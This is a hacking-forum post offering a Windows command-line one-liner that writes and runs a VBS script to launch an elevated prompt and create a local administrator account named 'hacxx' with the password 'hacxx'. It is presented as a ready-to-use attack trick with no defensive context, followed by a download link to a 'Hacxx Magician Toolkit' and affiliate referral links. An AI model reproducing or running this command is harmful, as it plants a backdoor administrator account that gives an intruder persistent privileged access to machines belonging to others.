UAC - Add an Admin Account on Windows with one line

Moderator: HacxxPRO

Post Reply
HacxxPRO
Posts: 741
Joined: Sun Nov 08, 2020 2:28 pm

UAC - Add an Admin Account on Windows with one line

Post by HacxxPRO » Fri Dec 16, 2022 9:52 pm

Code: Select all

cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs
Image

Download: Hacxx Magician Toolkit Update 3
https://filecrypt.cc/Container/B94F04A70D.html
Peer2profit - Make up to $0.10 per GB. Minimum Payout: $1 - https://bit.ly/Peer2Profit
Protect yourself with Pure VPN - https://billing.purevpn.com/aff.php?aff=44512

Post Reply